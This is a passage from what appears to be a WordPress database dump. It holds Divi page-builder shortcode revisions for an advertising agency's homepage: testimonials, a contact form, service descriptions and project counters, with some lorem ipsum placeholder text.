custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 21:25:57','2020-07-08 21:25:57','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(286,1,'2020-07-08 21:28:22','2020-07-08 21:28:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" 